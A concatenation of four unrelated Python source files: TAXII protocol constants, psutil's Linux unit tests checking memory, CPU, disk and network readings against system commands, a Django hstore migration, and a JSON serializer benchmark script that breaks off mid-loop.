ST_BAD_MESSAGE = 'BAD_MESSAGE'
ST_DENIED = 'DENIED'
ST_FAILURE = 'FAILURE'
ST_NOT_FOUND = 'NOT_FOUND'
ST_POLLING_UNSUPPORTED = 'POLLING_UNSUPPORTED'
ST_RETRY = 'RETRY'
ST_SUCCESS = 'SUCCESS'
ST_UNAUTHORIZED = 'UNAUTHORIZED'
ST_UNSUPPORTED_MESSAGE_BINDING = 'UNSUPPORTED_MESSAGE'
ST_UNSUPPORTED_CONTENT_BINDING = 'UNSUPPORTED_CONTENT'
ST_UNSUPPORTED_PROTOCOL = 'UNSUPPORTED_PROTOCOL'
ST_TYPES_10 = (ST_BAD_MESSAGE, ST_DENIED, ST_FAILURE, ST_NOT_FOUND,
ST_POLLING_UNSUPPORTED, ST_RETRY, ST_SUCCESS, ST_UNAUTHORIZED,
ST_UNSUPPORTED_MESSAGE_BINDING, ST_UNSUPPORTED_CONTENT_BINDING,
ST_UNSUPPORTED_PROTOCOL)
ST_ASYNCHRONOUS_POLL_ERROR = 'ASYNCHRONOUS_POLL_ERROR'
ST_DESTINATION_COLLECTION_ERROR = 'DESTINATION_COLLECTION_ERROR'
ST_INVALID_RESPONSE_PART = 'INVALID_RESPONSE_PART'
ST_NETWORK_ERROR = 'NETWORK_ERROR'
ST_PENDING = 'PENDING'
ST_UNSUPPORTED_QUERY = 'UNSUPPORTED_QUERY'
ST_TYPES_11 = (ST_ASYNCHRONOUS_POLL_ERROR, ST_BAD_MESSAGE, ST_DENIED,
ST_DESTINATION_COLLECTION_ERROR, ST_FAILURE, ST_INVALID_RESPONSE_PART,
ST_NETWORK_ERROR, ST_NOT_FOUND, ST_PENDING, ST_POLLING_UNSUPPORTED,
ST_RETRY, ST_SUCCESS, ST_UNAUTHORIZED, ST_UNSUPPORTED_MESSAGE_BINDING,
ST_UNSUPPORTED_CONTENT_BINDING, ST_UNSUPPORTED_PROTOCOL,
ST_UNSUPPORTED_QUERY)
ACT_SUBSCRIBE = 'SUBSCRIBE'
ACT_UNSUBSCRIBE = 'UNSUBSCRIBE'
ACT_STATUS = 'STATUS'
ACT_TYPES_10 = (ACT_SUBSCRIBE, ACT_UNSUBSCRIBE, ACT_STATUS)
ACT_PAUSE = 'PAUSE'
ACT_RESUME = 'RESUME'
ACT_TYPES_11 = (ACT_SUBSCRIBE, ACT_PAUSE, ACT_RESUME, ACT_UNSUBSCRIBE, ACT_STATUS)
SVC_INBOX = 'INBOX'
SVC_POLL = 'POLL'
SVC_FEED_MANAGEMENT = 'FEED_MANAGEMENT'
SVC_DISCOVERY = 'DISCOVERY'
SVC_TYPES_10 = (SVC_INBOX, SVC_POLL, SVC_FEED_MANAGEMENT, SVC_DISCOVERY)
SVC_COLLECTION_MANAGEMENT = 'COLLECTION_MANAGEMENT'
SVC_TYPES_11 = (SVC_INBOX, SVC_POLL, SVC_COLLECTION_MANAGEMENT, SVC_DISCOVERY)
SS_ACTIVE = 'ACTIVE'
SS_PAUSED = 'PAUSED'
SS_UNSUBSCRIBED = 'UNSUBSCRIBED'
SS_TYPES_11 = (SS_ACTIVE, SS_PAUSED, SS_UNSUBSCRIBED)
RT_FULL = 'FULL'
RT_COUNT_ONLY = 'COUNT_ONLY'
RT_TYPES_11 = (RT_FULL, RT_COUNT_ONLY)
CT_DATA_FEED = 'DATA_FEED'
CT_DATA_SET = 'DATA_SET'
CT_TYPES_11 = (CT_DATA_FEED, CT_DATA_SET)
SD_ACCEPTABLE_DESTINATION = 'ACCEPTABLE_DESTINATION'
SD_MAX_PART_NUMBER = 'MAX_PART_NUMBER'
SD_ITEM = 'ITEM'
SD_ESTIMATED_WAIT = 'ESTIMATED_WAIT'
SD_RESULT_ID = 'RESULT_ID'
SD_WILL_PUSH = 'WILL_PUSH'
SD_SUPPORTED_BINDING = 'SUPPORTED_BINDING'
SD_SUPPORTED_CONTENT = 'SUPPORTED_CONTENT'
SD_SUPPORTED_PROTOCOL = 'SUPPORTED_PROTOCOL'
SD_SUPPORTED_QUERY = 'SUPPORTED_QUERY'
SD_TYPES_11 = (SD_ACCEPTABLE_DESTINATION, SD_MAX_PART_NUMBER, SD_ITEM,
SD_ESTIMATED_WAIT, SD_RESULT_ID, SD_WILL_PUSH,
SD_SUPPORTED_BINDING, SD_SUPPORTED_CONTENT, SD_SUPPORTED_PROTOCOL,
SD_SUPPORTED_QUERY)
SD_CAPABILITY_MODULE = 'CAPABILITY_MODULE'
SD_PREFERRED_SCOPE = 'PREFERRED_SCOPE'
SD_ALLOWED_SCOPE = 'ALLOWED_SCOPE'
SD_TARGETING_EXPRESSION_ID = 'TARGETING_EXPRESSION_ID'
FID_TAXII_DEFAULT_QUERY_10 = 'urn:taxii.mitre.org:query:default:1.0'
CM_CORE = 'urn:taxii.mitre.org:query:capability:core-1'
CM_REGEX = 'urn:taxii.mitre.org:query:capability:regex-1'
CM_TIMESTAMP = 'urn:taxii.mitre.org:query:capability:timestamp-1'
CM_IDS = (CM_CORE, CM_REGEX, CM_TIMESTAMP)
OP_OR = 'OR'
OP_AND = 'AND'
OP_TYPES = (OP_OR, OP_AND)
ST_UNSUPPORTED_CAPABILITY_MODULE = 'UNSUPPORTED_CAPABILITY_MODULE'
ST_UNSUPPORTED_TARGETING_EXPRESSION = 'UNSUPPORTED_TARGETING_EXPRESSION'
ST_UNSUPPORTED_TARGETING_EXPRESSION_ID = 'UNSUPPORTED_TARGETING_EXPRESSION_ID'
P_VALUE = 'value'
P_MATCH_TYPE = 'match_type'
P_CASE_SENSITIVE = 'case_sensitive'
P_NAMES = (P_VALUE, P_MATCH_TYPE, P_CASE_SENSITIVE)
R_EQUALS = 'equals'
R_NOT_EQUALS = 'not_equals'
R_GREATER_THAN = 'greater_than'
R_GREATER_THAN_OR_EQUAL = 'greater_than_or_equal'
R_LESS_THAN = 'less_than'
R_LESS_THAN_OR_EQUAL = 'less_than_or_equal'
R_DOES_NOT_EXIST = 'does_not_exist'
R_EXISTS = 'exists'
R_BEGINS_WITH = 'begins_with'
R_ENDS_WITH = 'ends_with'
R_CONTAINS = 'contains'
R_MATCHES = 'matches'
R_NAMES = (R_EQUALS, R_NOT_EQUALS, R_GREATER_THAN,
R_GREATER_THAN_OR_EQUAL, R_LESS_THAN,
R_LESS_THAN_OR_EQUAL, R_DOES_NOT_EXIST,
R_EXISTS, R_BEGINS_WITH, R_ENDS_WITH,
R_CONTAINS, R_MATCHES)
VID_TAXII_SERVICES_10 = 'urn:taxii.mitre.org:services:1.0'
VID_TAXII_SERVICES_11 = 'urn:taxii.mitre.org:services:1.1'
VID_TAXII_XML_10 = 'urn:taxii.mitre.org:message:xml:1.0'
VID_TAXII_XML_11 = 'urn:taxii.mitre.org:message:xml:1.1'
VID_TAXII_HTTP_10 = 'urn:taxii.mitre.org:protocol:http:1.0'
VID_TAXII_HTTPS_10 = 'urn:taxii.mitre.org:protocol:https:1.0'
VID_CERT_EU_JSON_10 = 'urn:cert.europa.eu:message:json:1.0'
CB_STIX_XML_10 = 'urn:stix.mitre.org:xml:1.0'
CB_STIX_XML_101 = 'urn:stix.mitre.org:xml:1.0.1'
CB_STIX_XML_11 = 'urn:stix.mitre.org:xml:1.1'
CB_STIX_XML_111 = 'urn:stix.mitre.org:xml:1.1.1'
CB_CAP_11 = 'urn:oasis:names:tc:emergency:cap:1.1'
CB_XENC_122002 = 'http://www.w3.org/2001/04/xmlenc#'
CB_SMIME = 'application/x-pkcs7-mime'
STD_INDENT = ' ' # A "Standard Indent" to use for to_text() methods
|
"""Linux specific tests."""
import contextlib
import errno
import io
import os
import pprint
import re
import shutil
import socket
import struct
import tempfile
import textwrap
import time
import warnings
try:
from unittest import mock # py3
except ImportError:
import mock # requires "pip install mock"
import psutil
from psutil import LINUX
from psutil._compat import PY3
from psutil._compat import u
from psutil.tests import call_until
from psutil.tests import get_kernel_version
from psutil.tests import importlib
from psutil.tests import MEMORY_TOLERANCE
from psutil.tests import pyrun
from psutil.tests import reap_children
from psutil.tests import retry_before_failing
from psutil.tests import run_test_module_by_name
from psutil.tests import sh
from psutil.tests import skip_on_not_implemented
from psutil.tests import TESTFN
from psutil.tests import TRAVIS
from psutil.tests import unittest
from psutil.tests import which
HERE = os.path.abspath(os.path.dirname(__file__))
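# ioctl request codes for querying network interface addresses (see <linux/sockios.h>).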
SIOCGIFADDR = 0x8915
SIOCGIFCONF = 0x8912
SIOCGIFHWADDR = 0x8927
def get_ipv4_address(ifname):
import fcntl
ifname = ifname[:15]
if PY3:
ifname = bytes(ifname, 'ascii')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with contextlib.closing(s):
return socket.inet_ntoa(
fcntl.ioctl(s.fileno(),
SIOCGIFADDR,
struct.pack('256s', ifname))[20:24])
def get_mac_address(ifname):
import fcntl
ifname = ifname[:15]
if PY3:
ifname = bytes(ifname, 'ascii')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with contextlib.closing(s):
info = fcntl.ioctl(
s.fileno(), SIOCGIFHWADDR, struct.pack('256s', ifname))
if PY3:
def ord(x):
return x
else:
import __builtin__
ord = __builtin__.ord
return ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
def free_swap():
"""Parse 'free' cmd and return swap memory's s total, used and free
values.
"""
lines = sh('free').split('\n')
for line in lines:
if line.startswith('Swap'):
_, total, used, free = line.split()
return (int(total) * 1024, int(used) * 1024, int(free) * 1024)
def free_physmem():
"""Parse 'free' cmd and return physical memory's total, used
and free values.
"""
lines = sh('free').split('\n')
for line in lines:
if line.startswith('Mem'):
total, used, free, shared, buffers, cached = \
[int(x) * 1024 for x in line.split()[1:]]
return (total, used, free, shared, buffers, cached)
@unittest.skipUnless(LINUX, "not a Linux system")
class TestSystemMemory(unittest.TestCase):
def test_vmem_total(self):
total, used, free, shared, buffers, cached = free_physmem()
self.assertEqual(total, psutil.virtual_memory().total)
@retry_before_failing()
def test_vmem_used(self):
total, used, free, shared, buffers, cached = free_physmem()
self.assertAlmostEqual(used, psutil.virtual_memory().used,
delta=MEMORY_TOLERANCE)
@retry_before_failing()
def test_vmem_free(self):
total, used, free, shared, buffers, cached = free_physmem()
self.assertAlmostEqual(free, psutil.virtual_memory().free,
delta=MEMORY_TOLERANCE)
@retry_before_failing()
def test_vmem_buffers(self):
buffers = int(sh('vmstat').split('\n')[2].split()[4]) * 1024
self.assertAlmostEqual(buffers, psutil.virtual_memory().buffers,
delta=MEMORY_TOLERANCE)
@retry_before_failing()
def test_vmem_cached(self):
cached = int(sh('vmstat').split('\n')[2].split()[5]) * 1024
self.assertAlmostEqual(cached, psutil.virtual_memory().cached,
delta=MEMORY_TOLERANCE)
def test_swapmem_total(self):
total, used, free = free_swap()
return self.assertAlmostEqual(total, psutil.swap_memory().total,
delta=MEMORY_TOLERANCE)
@retry_before_failing()
def test_swapmem_used(self):
total, used, free = free_swap()
return self.assertAlmostEqual(used, psutil.swap_memory().used,
delta=MEMORY_TOLERANCE)
@retry_before_failing()
def test_swapmem_free(self):
total, used, free = free_swap()
return self.assertAlmostEqual(free, psutil.swap_memory().free,
delta=MEMORY_TOLERANCE)
# --- mocked tests
def test_virtual_memory_mocked_warnings(self):
with mock.patch('psutil._pslinux.open', create=True) as m:
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always")
ret = psutil._pslinux.virtual_memory()
assert m.called
self.assertEqual(len(ws), 1)
w = ws[0]
self.assertTrue(w.filename.endswith('psutil/_pslinux.py'))
self.assertIn(
"'cached', 'active' and 'inactive' memory stats couldn't "
"be determined", str(w.message))
self.assertEqual(ret.cached, 0)
self.assertEqual(ret.active, 0)
self.assertEqual(ret.inactive, 0)
def test_swap_memory_mocked_warnings(self):
with mock.patch('psutil._pslinux.open', create=True) as m:
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always")
ret = psutil._pslinux.swap_memory()
assert m.called
self.assertEqual(len(ws), 1)
w = ws[0]
self.assertTrue(w.filename.endswith('psutil/_pslinux.py'))
self.assertIn(
"'sin' and 'sout' swap memory stats couldn't "
"be determined", str(w.message))
self.assertEqual(ret.sin, 0)
self.assertEqual(ret.sout, 0)
def test_swap_memory_mocked_no_vmstat(self):
# see https://github.com/giampaolo/psutil/issues/722
with mock.patch('psutil._pslinux.open', create=True,
side_effect=IOError) as m:
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always")
ret = psutil.swap_memory()
assert m.called
self.assertEqual(len(ws), 1)
w = ws[0]
self.assertTrue(w.filename.endswith('psutil/_pslinux.py'))
self.assertIn(
"'sin' and 'sout' swap memory stats couldn't "
"be determined and were set to 0",
str(w.message))
self.assertEqual(ret.sin, 0)
self.assertEqual(ret.sout, 0)
@unittest.skipUnless(LINUX, "not a Linux system")
class TestSystemCPU(unittest.TestCase):
@unittest.skipIf(TRAVIS, "unknown failure on travis")
def test_cpu_times(self):
fields = psutil.cpu_times()._fields
        kernel_ver = re.findall(r'\d+\.\d+\.\d+', os.uname()[2])[0]
kernel_ver_info = tuple(map(int, kernel_ver.split('.')))
if kernel_ver_info >= (2, 6, 11):
self.assertIn('steal', fields)
else:
self.assertNotIn('steal', fields)
if kernel_ver_info >= (2, 6, 24):
self.assertIn('guest', fields)
else:
self.assertNotIn('guest', fields)
if kernel_ver_info >= (3, 2, 0):
self.assertIn('guest_nice', fields)
else:
self.assertNotIn('guest_nice', fields)
@unittest.skipUnless(which("nproc"), "nproc utility not available")
def test_cpu_count_logical_w_nproc(self):
num = int(sh("nproc --all"))
self.assertEqual(psutil.cpu_count(logical=True), num)
@unittest.skipUnless(which("lscpu"), "lscpu utility not available")
def test_cpu_count_logical_w_lscpu(self):
out = sh("lscpu -p")
num = len([x for x in out.split('\n') if not x.startswith('#')])
self.assertEqual(psutil.cpu_count(logical=True), num)
def test_cpu_count_logical_mocked(self):
import psutil._pslinux
original = psutil._pslinux.cpu_count_logical()
# Here we want to mock os.sysconf("SC_NPROCESSORS_ONLN") in
# order to cause the parsing of /proc/cpuinfo and /proc/stat.
with mock.patch(
'psutil._pslinux.os.sysconf', side_effect=ValueError) as m:
self.assertEqual(psutil._pslinux.cpu_count_logical(), original)
assert m.called
        # Let's have open() return empty data and make sure None is
        # returned ('cause we mimic os.cpu_count()).
with mock.patch('psutil._pslinux.open', create=True) as m:
self.assertIsNone(psutil._pslinux.cpu_count_logical())
self.assertEqual(m.call_count, 2)
# /proc/stat should be the last one
self.assertEqual(m.call_args[0][0], '/proc/stat')
# Let's push this a bit further and make sure /proc/cpuinfo
# parsing works as expected.
with open('/proc/cpuinfo', 'rb') as f:
cpuinfo_data = f.read()
fake_file = io.BytesIO(cpuinfo_data)
with mock.patch('psutil._pslinux.open',
return_value=fake_file, create=True) as m:
self.assertEqual(psutil._pslinux.cpu_count_logical(), original)
def test_cpu_count_physical_mocked(self):
        # Have open() return empty data and make sure None is returned
        # ('cause we want to mimic os.cpu_count())
with mock.patch('psutil._pslinux.open', create=True) as m:
self.assertIsNone(psutil._pslinux.cpu_count_physical())
assert m.called
@unittest.skipUnless(LINUX, "not a Linux system")
class TestSystemNetwork(unittest.TestCase):
def test_net_if_addrs_ips(self):
for name, addrs in psutil.net_if_addrs().items():
for addr in addrs:
if addr.family == psutil.AF_LINK:
self.assertEqual(addr.address, get_mac_address(name))
elif addr.family == socket.AF_INET:
self.assertEqual(addr.address, get_ipv4_address(name))
# TODO: test for AF_INET6 family
@unittest.skipUnless(which('ip'), "'ip' utility not available")
@unittest.skipIf(TRAVIS, "skipped on Travis")
def test_net_if_names(self):
out = sh("ip addr").strip()
nics = [x for x in psutil.net_if_addrs().keys() if ':' not in x]
found = 0
for line in out.split('\n'):
line = line.strip()
            if re.search(r"^\d+:", line):
found += 1
name = line.split(':')[1].strip()
self.assertIn(name, nics)
self.assertEqual(len(nics), found, msg="%s\n---\n%s" % (
pprint.pformat(nics), out))
@mock.patch('psutil._pslinux.socket.inet_ntop', side_effect=ValueError)
@mock.patch('psutil._pslinux.supports_ipv6', return_value=False)
def test_net_connections_ipv6_unsupported(self, supports_ipv6, inet_ntop):
# see: https://github.com/giampaolo/psutil/issues/623
try:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind(("::1", 0))
except socket.error:
pass
psutil.net_connections(kind='inet6')
@unittest.skipUnless(LINUX, "not a Linux system")
class TestSystemDisks(unittest.TestCase):
@unittest.skipUnless(
hasattr(os, 'statvfs'), "os.statvfs() function not available")
@skip_on_not_implemented()
def test_disk_partitions_and_usage(self):
# test psutil.disk_usage() and psutil.disk_partitions()
# against "df -a"
def df(path):
out = sh('df -P -B 1 "%s"' % path).strip()
lines = out.split('\n')
lines.pop(0)
line = lines.pop(0)
dev, total, used, free = line.split()[:4]
if dev == 'none':
dev = ''
total, used, free = int(total), int(used), int(free)
return dev, total, used, free
for part in psutil.disk_partitions(all=False):
usage = psutil.disk_usage(part.mountpoint)
dev, total, used, free = df(part.mountpoint)
self.assertEqual(usage.total, total)
            # 10 MB tolerance
if abs(usage.free - free) > 10 * 1024 * 1024:
self.fail("psutil=%s, df=%s" % (usage.free, free))
if abs(usage.used - used) > 10 * 1024 * 1024:
self.fail("psutil=%s, df=%s" % (usage.used, used))
def test_disk_partitions_mocked(self):
# Test that ZFS partitions are returned.
with open("/proc/filesystems", "r") as f:
data = f.read()
if 'zfs' in data:
for part in psutil.disk_partitions():
if part.fstype == 'zfs':
break
else:
self.fail("couldn't find any ZFS partition")
else:
# No ZFS partitions on this system. Let's fake one.
fake_file = io.StringIO(u("nodev\tzfs\n"))
with mock.patch('psutil._pslinux.open',
return_value=fake_file, create=True) as m1:
with mock.patch(
'psutil._pslinux.cext.disk_partitions',
return_value=[('/dev/sdb3', '/', 'zfs', 'rw')]) as m2:
ret = psutil.disk_partitions()
assert m1.called
assert m2.called
assert ret
self.assertEqual(ret[0].fstype, 'zfs')
@unittest.skipUnless(LINUX, "not a Linux system")
class TestMisc(unittest.TestCase):
@mock.patch('psutil.traceback.print_exc')
def test_no_procfs_on_import(self, tb):
my_procfs = tempfile.mkdtemp()
with open(os.path.join(my_procfs, 'stat'), 'w') as f:
f.write('cpu 0 0 0 0 0 0 0 0 0 0\n')
f.write('cpu0 0 0 0 0 0 0 0 0 0 0\n')
f.write('cpu1 0 0 0 0 0 0 0 0 0 0\n')
try:
orig_open = open
def open_mock(name, *args):
if name.startswith('/proc'):
raise IOError(errno.ENOENT, 'rejecting access for test')
return orig_open(name, *args)
patch_point = 'builtins.open' if PY3 else '__builtin__.open'
with mock.patch(patch_point, side_effect=open_mock):
importlib.reload(psutil)
assert tb.called
self.assertRaises(IOError, psutil.cpu_times)
self.assertRaises(IOError, psutil.cpu_times, percpu=True)
self.assertRaises(IOError, psutil.cpu_percent)
self.assertRaises(IOError, psutil.cpu_percent, percpu=True)
self.assertRaises(IOError, psutil.cpu_times_percent)
self.assertRaises(
IOError, psutil.cpu_times_percent, percpu=True)
psutil.PROCFS_PATH = my_procfs
self.assertEqual(psutil.cpu_percent(), 0)
self.assertEqual(sum(psutil.cpu_times_percent()), 0)
# since we don't know the number of CPUs at import time,
# we awkwardly say there are none until the second call
per_cpu_percent = psutil.cpu_percent(percpu=True)
self.assertEqual(sum(per_cpu_percent), 0)
# ditto awkward length
per_cpu_times_percent = psutil.cpu_times_percent(percpu=True)
self.assertEqual(sum(map(sum, per_cpu_times_percent)), 0)
# much user, very busy
with open(os.path.join(my_procfs, 'stat'), 'w') as f:
f.write('cpu 1 0 0 0 0 0 0 0 0 0\n')
f.write('cpu0 1 0 0 0 0 0 0 0 0 0\n')
f.write('cpu1 1 0 0 0 0 0 0 0 0 0\n')
self.assertNotEqual(psutil.cpu_percent(), 0)
self.assertNotEqual(
sum(psutil.cpu_percent(percpu=True)), 0)
self.assertNotEqual(sum(psutil.cpu_times_percent()), 0)
self.assertNotEqual(
sum(map(sum, psutil.cpu_times_percent(percpu=True))), 0)
finally:
shutil.rmtree(my_procfs)
importlib.reload(psutil)
self.assertEqual(psutil.PROCFS_PATH, '/proc')
@unittest.skipUnless(
get_kernel_version() >= (2, 6, 36),
"prlimit() not available on this Linux kernel version")
def test_prlimit_availability(self):
# prlimit() should be available starting from kernel 2.6.36
p = psutil.Process(os.getpid())
p.rlimit(psutil.RLIMIT_NOFILE)
# if prlimit() is supported *at least* these constants should
# be available
self.assertTrue(hasattr(psutil, "RLIM_INFINITY"))
self.assertTrue(hasattr(psutil, "RLIMIT_AS"))
self.assertTrue(hasattr(psutil, "RLIMIT_CORE"))
self.assertTrue(hasattr(psutil, "RLIMIT_CPU"))
self.assertTrue(hasattr(psutil, "RLIMIT_DATA"))
self.assertTrue(hasattr(psutil, "RLIMIT_FSIZE"))
self.assertTrue(hasattr(psutil, "RLIMIT_LOCKS"))
self.assertTrue(hasattr(psutil, "RLIMIT_MEMLOCK"))
self.assertTrue(hasattr(psutil, "RLIMIT_NOFILE"))
self.assertTrue(hasattr(psutil, "RLIMIT_NPROC"))
self.assertTrue(hasattr(psutil, "RLIMIT_RSS"))
self.assertTrue(hasattr(psutil, "RLIMIT_STACK"))
@unittest.skipUnless(
get_kernel_version() >= (3, 0),
"prlimit constants not available on this Linux kernel version")
def test_resource_consts_kernel_v(self):
# more recent constants
self.assertTrue(hasattr(psutil, "RLIMIT_MSGQUEUE"))
self.assertTrue(hasattr(psutil, "RLIMIT_NICE"))
self.assertTrue(hasattr(psutil, "RLIMIT_RTPRIO"))
self.assertTrue(hasattr(psutil, "RLIMIT_RTTIME"))
self.assertTrue(hasattr(psutil, "RLIMIT_SIGPENDING"))
def test_boot_time_mocked(self):
with mock.patch('psutil._pslinux.open', create=True) as m:
self.assertRaises(
RuntimeError,
psutil._pslinux.boot_time)
assert m.called
def test_users_mocked(self):
# Make sure ':0' and ':0.0' (returned by C ext) are converted
# to 'localhost'.
with mock.patch('psutil._pslinux.cext.users',
return_value=[('giampaolo', 'pts/2', ':0',
1436573184.0, True)]) as m:
self.assertEqual(psutil.users()[0].host, 'localhost')
assert m.called
with mock.patch('psutil._pslinux.cext.users',
return_value=[('giampaolo', 'pts/2', ':0.0',
1436573184.0, True)]) as m:
self.assertEqual(psutil.users()[0].host, 'localhost')
assert m.called
# ...otherwise it should be returned as-is
with mock.patch('psutil._pslinux.cext.users',
return_value=[('giampaolo', 'pts/2', 'foo',
1436573184.0, True)]) as m:
self.assertEqual(psutil.users()[0].host, 'foo')
assert m.called
def test_procfs_path(self):
tdir = tempfile.mkdtemp()
try:
psutil.PROCFS_PATH = tdir
self.assertRaises(IOError, psutil.virtual_memory)
self.assertRaises(IOError, psutil.cpu_times)
self.assertRaises(IOError, psutil.cpu_times, percpu=True)
self.assertRaises(IOError, psutil.boot_time)
# self.assertRaises(IOError, psutil.pids)
self.assertRaises(IOError, psutil.net_connections)
self.assertRaises(IOError, psutil.net_io_counters)
self.assertRaises(IOError, psutil.net_if_stats)
self.assertRaises(IOError, psutil.disk_io_counters)
self.assertRaises(IOError, psutil.disk_partitions)
self.assertRaises(psutil.NoSuchProcess, psutil.Process)
finally:
psutil.PROCFS_PATH = "/proc"
os.rmdir(tdir)
@unittest.skipUnless(LINUX, "not a Linux system")
class TestProcess(unittest.TestCase):
def test_memory_maps(self):
src = textwrap.dedent("""
import time
with open("%s", "w") as f:
time.sleep(10)
""" % TESTFN)
sproc = pyrun(src)
self.addCleanup(reap_children)
call_until(lambda: os.listdir('.'), "'%s' not in ret" % TESTFN)
p = psutil.Process(sproc.pid)
time.sleep(.1)
maps = p.memory_maps(grouped=False)
pmap = sh('pmap -x %s' % p.pid).split('\n')
# get rid of header
del pmap[0]
del pmap[0]
while maps and pmap:
this = maps.pop(0)
other = pmap.pop(0)
addr, _, rss, dirty, mode, path = other.split(None, 5)
if not path.startswith('[') and not path.endswith(']'):
self.assertEqual(path, os.path.basename(this.path))
self.assertEqual(int(rss) * 1024, this.rss)
# test only rwx chars, ignore 's' and 'p'
self.assertEqual(mode[:3], this.perms[:3])
def test_memory_addrspace_info(self):
src = textwrap.dedent("""
import time
with open("%s", "w") as f:
time.sleep(10)
""" % TESTFN)
sproc = pyrun(src)
self.addCleanup(reap_children)
call_until(lambda: os.listdir('.'), "'%s' not in ret" % TESTFN)
p = psutil.Process(sproc.pid)
time.sleep(.1)
mem = p.memory_addrspace_info()
maps = p.memory_maps(grouped=False)
self.assertEqual(
mem.uss, sum([x.private_dirty + x.private_clean for x in maps]))
self.assertEqual(
mem.pss, sum([x.pss for x in maps]))
self.assertEqual(
mem.swap, sum([x.swap for x in maps]))
def test_open_files_file_gone(self):
# simulates a file which gets deleted during open_files()
# execution
p = psutil.Process()
files = p.open_files()
with tempfile.NamedTemporaryFile():
# give the kernel some time to see the new file
call_until(p.open_files, "len(ret) != %i" % len(files))
with mock.patch('psutil._pslinux.os.readlink',
side_effect=OSError(errno.ENOENT, "")) as m:
files = p.open_files()
assert not files
assert m.called
# also simulate the case where os.readlink() returns EINVAL
# in which case psutil is supposed to 'continue'
with mock.patch('psutil._pslinux.os.readlink',
side_effect=OSError(errno.EINVAL, "")) as m:
self.assertEqual(p.open_files(), [])
assert m.called
# --- mocked tests
def test_terminal_mocked(self):
with mock.patch('psutil._pslinux._psposix._get_terminal_map',
return_value={}) as m:
self.assertIsNone(psutil._pslinux.Process(os.getpid()).terminal())
assert m.called
def test_num_ctx_switches_mocked(self):
with mock.patch('psutil._pslinux.open', create=True) as m:
self.assertRaises(
NotImplementedError,
psutil._pslinux.Process(os.getpid()).num_ctx_switches)
assert m.called
def test_num_threads_mocked(self):
with mock.patch('psutil._pslinux.open', create=True) as m:
self.assertRaises(
NotImplementedError,
psutil._pslinux.Process(os.getpid()).num_threads)
assert m.called
def test_ppid_mocked(self):
with mock.patch('psutil._pslinux.open', create=True) as m:
self.assertRaises(
NotImplementedError,
psutil._pslinux.Process(os.getpid()).ppid)
assert m.called
def test_uids_mocked(self):
with mock.patch('psutil._pslinux.open', create=True) as m:
self.assertRaises(
NotImplementedError,
psutil._pslinux.Process(os.getpid()).uids)
assert m.called
def test_gids_mocked(self):
with mock.patch('psutil._pslinux.open', create=True) as m:
self.assertRaises(
NotImplementedError,
psutil._pslinux.Process(os.getpid()).gids)
assert m.called
def test_cmdline_mocked(self):
# see: https://github.com/giampaolo/psutil/issues/639
p = psutil.Process()
fake_file = io.StringIO(u('foo\x00bar\x00'))
with mock.patch('psutil._pslinux.open',
return_value=fake_file, create=True) as m:
            self.assertEqual(p.cmdline(), ['foo', 'bar'])
assert m.called
fake_file = io.StringIO(u('foo\x00bar\x00\x00'))
with mock.patch('psutil._pslinux.open',
return_value=fake_file, create=True) as m:
            self.assertEqual(p.cmdline(), ['foo', 'bar', ''])
assert m.called
def test_io_counters_mocked(self):
with mock.patch('psutil._pslinux.open', create=True) as m:
self.assertRaises(
NotImplementedError,
psutil._pslinux.Process(os.getpid()).io_counters)
assert m.called
def test_readlink_path_deleted_mocked(self):
with mock.patch('psutil._pslinux.os.readlink',
return_value='/home/foo (deleted)'):
self.assertEqual(psutil.Process().exe(), "/home/foo")
self.assertEqual(psutil.Process().cwd(), "/home/foo")
if __name__ == '__main__':
run_test_module_by_name(__file__)
|
from django.db import migrations, models
import django.contrib.postgres.fields.hstore
class Migration(migrations.Migration):
dependencies = [
('hs_core', '0035_remove_deprecated_fields'),
]
operations = [
migrations.AddField(
model_name='contributor',
name='identifiers',
field=django.contrib.postgres.fields.hstore.HStoreField(default={}),
),
migrations.AddField(
model_name='creator',
name='identifiers',
field=django.contrib.postgres.fields.hstore.HStoreField(default={}),
),
]
|
import random
import sys
import time
import pytest
try:
import yajl
except ImportError:
yajl = None
try:
import simplejson
except ImportError:
simplejson = None
try:
import json
except ImportError:
json = None
try:
import rapidjson
except ImportError:
rapidjson = None
try:
import ujson
except ImportError:
ujson = None
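# Benchmark payloads: a mixed default document plus the more targeted datasets built below.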
default_data = {
'words': """
Lorem ipsum dolor sit amet, consectetur adipiscing
elit. Mauris adipiscing adipiscing placerat.
Vestibulum augue augue,
pellentesque quis sollicitudin id, adipiscing.
""",
'list': list(range(200)),
'dict': dict((str(i), 'a') for i in list(range(200))),
'int': 100100100,
'float': 100999.123456
}
user = {
"userId": 3381293,
"age": 213,
"username": "johndoe",
"fullname": u"John Doe the Second",
"isAuthorized": True,
"liked": 31231.31231202,
"approval": 31.1471,
"jobs": [1, 2],
"currJob": None
}
friends = [user, user, user, user, user, user, user, user]
def time_func(func, data, iterations):
start = time.time()
while iterations:
iterations -= 1
func(data)
return time.time() - start
def run_client_test(
name, serialize, deserialize, iterations=100 * 1000, data=default_data
):
squashed_data = serialize(data)
serialize_profile = time_func(serialize, data, iterations)
deserialize_profile = time_func(deserialize, squashed_data, iterations)
return serialize_profile, deserialize_profile
contenders = []
if yajl:
contenders.append(('yajl', yajl.Encoder().encode, yajl.Decoder().decode))
if simplejson:
contenders.append(('simplejson', simplejson.dumps, simplejson.loads))
if json:
contenders.append(('stdlib json', json.dumps, json.loads))
if rapidjson:
contenders.append(
('rapidjson', rapidjson.dumps, rapidjson.loads)
)
if ujson:
contenders.append(
('ujson', ujson.dumps, ujson.loads)
)
doubles = []
unicode_strings = []
strings = []
booleans = []
list_dicts = []
dict_lists = {}
medium_complex = [
[user, friends], [user, friends], [user, friends],
[user, friends], [user, friends], [user, friends]
]
for x in range(256):
doubles.append(sys.maxsize * random.random())
unicode_strings.append(
"نظام الحكم سلطاني وراثي في الذكور من ذرية السيد تركي بن سعيد بن سلطان ويشترط فيمن يختار لولاية الحكم من بينهم ان يكون مسلما رشيدا عاقلا ًوابنا شرعيا لابوين عمانيين ")
strings.append("A pretty long string which is in a list")
booleans.append(True)
for y in range(100):
arrays = []
list_dicts.append({str(random.random() * 20): int(random.random() * 1000000)})
